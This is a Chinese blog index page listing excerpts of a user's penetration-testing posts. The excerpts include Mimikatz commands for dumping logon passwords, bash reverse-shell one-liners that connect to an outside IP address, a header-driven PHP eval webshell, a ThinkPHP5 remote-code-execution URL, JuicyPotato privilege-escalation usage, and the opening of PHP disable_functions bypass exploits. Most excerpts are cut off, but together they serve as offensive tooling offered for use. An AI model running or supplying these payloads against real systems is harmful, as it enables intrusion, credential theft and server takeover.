会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
err0">
你真的够努力吗?
博客园
首页
新随笔
联系
订阅
管理
[置顶]
web全套资料 干货满满 各种文章详解
摘要: sql注入lMySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结 SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过MSSQLMSSQL DBA权限获取WEBSHELL的过程 MSSQL 注入攻击
阅读全文
posted @ 2017-09-19 21:59 Hookjoy
阅读(2759)
评论(0)
推荐(5)
[置顶]
Mimikatz 使用Tips
摘要: 1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::de
阅读全文
posted @ 2015-09-20 00:06 Hookjoy
阅读(2619)
评论(0)
推荐(0)
[置顶]
php利用wsh突破函数禁用执行命令(安全模式同理)
摘要: 很多时候有些windows的服务器是支持wsh组建的,但是却执行不了命令,asp下执行被拒绝,php下执行报错,此时你可以借鉴以下的方法尝试。 php利用wsh突破函数禁用执行命令(安全模式同理)条件说明: 需要服务器是windows并支持wsh组建.且知道php安装目录php在IIS环境下利用ws
阅读全文
posted @ 2014-12-14 04:56 Hookjoy
阅读(1570)
评论(0)
推荐(0)
2020年5月7日
浅谈几种Bypass open_basedir的方法
摘要: 0x01 open_basedir open_basedir是php.ini中的一个配置选项,可用于将用户访问文件的活动范围限制在指定的区域。 假设open_basedir=/var/www/html/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/var/www/h
阅读全文
posted @ 2020-05-07 22:20 Hookjoy
阅读(2365)
评论(0)
推荐(0)
2020年4月28日
反弹shell的各种基础姿势
摘要: Bash TCP: Victim: bash -i >& /dev/tcp/175.11.142.54/443 0>&1 Copy /bin/bash -i > /dev/tcp/175.11.142.54/443 0<& 2>&1 Copy exec 5<>/dev/tcp/175.11.142.
阅读全文
posted @ 2020-04-28 23:56 Hookjoy
阅读(849)
评论(1)
推荐(0)
2020年4月24日
云安全-AccessKey渗透中的利用
摘要: 一本黑, 一本黑 • 2020年4月12日 pm4:32 • 渗透测试 • 阅读 382 内容不太适合以公开的形式发布, 做项目时候发现AWS与某云OSS的AccessKey,然后去某云官网看文档发现很多有意思的东西。 文章整体结构: 渗透场景 云术语了解 创建一个OSS 访问控制了解 Access
阅读全文
posted @ 2020-04-24 01:04 Hookjoy
阅读(3917)
评论(0)
推荐(0)
2020年4月5日
APP测试之安全机制问题及Bypass
摘要: APP测试之安全机制问题及Bypass 前言 在一次APP漏洞挖掘的过程中又遇到了之前都会遇到的一个问题今天来讨论一下APP安全渗透测试及漏洞挖掘中遇到的这个问题并进行一些总结,其中有一些方法之前也有许多师傅分享过,这里再次遇到正好想归结到一起,若对移动APP安全机制绕过有兴趣的师傅也能够一起交
阅读全文
posted @ 2020-04-05 19:55 Hookjoy
阅读(822)
评论(0)
推荐(0)
2020年4月1日
PHP 7.1-7.3 disable_functions bypass
摘要: <?php $cmd = "id"; $n_alloc = 10; # increase this value if you get segfaults class MySplFixedArray extends SplFixedArray { public static $leak; } clas
阅读全文
posted @ 2020-04-01 18:32 Hookjoy
阅读(482)
评论(0)
推荐(0)
2020年3月11日
JuicyPotato提权用法
摘要: 用法"C:\ProgramData\JuicyPotato.exe" -t * -l 1337 -c {0A886F29-465A-4aea-8B8E-BE926BFAE83E} -p whoami 2008R2系统SYSTEM权限的CLSID: Copy to clipboard {03ca98d
阅读全文
posted @ 2020-03-11 01:56 Hookjoy
阅读(3401)
评论(0)
推荐(0)
2019年12月30日
PHP利用Apache、Nginx的特性实现免杀Webshell
摘要: 环境函数用法 nginx get_defined_vars() 返回由所有已定义变量所组成的数组 apache getallheaders() 获取全部 HTTP 请求头信息 apache环境 1 2 3 <?php eval(next(getallheaders())); ?> 1 2 3 <?p
阅读全文
posted @ 2019-12-30 02:03 Hookjoy
阅读(525)
评论(0)
推荐(0)
2019年12月16日
PHP 7.0 7.3 (Unix) - 'gc' Disable Functions Bypass
摘要: = 0; $j--) { $address >= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i >= 8; } } function le...
阅读全文
posted @ 2019-12-16 10:29 Hookjoy
阅读(584)
评论(0)
推荐(0)
2019年11月29日
mshta 绕过限制下载文件
只有注册用户登录后才能阅读该文。
阅读全文
posted @ 2019-11-29 22:11 Hookjoy
阅读(9)
评论(0)
推荐(0)
2019年11月3日
ThinkPHP5.x.x各版本实战环境getshell
摘要: #这个文章我之前在t00ls已经分享过了 #内容只是对tp5的实战环境下getshell做的记录,中间遇到的一些小问题的突破,没啥技术含量 -5.1.18 http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_us
阅读全文
posted @ 2019-11-03 11:47 Hookjoy
阅读(1516)
评论(0)
推荐(0)
下一页
公告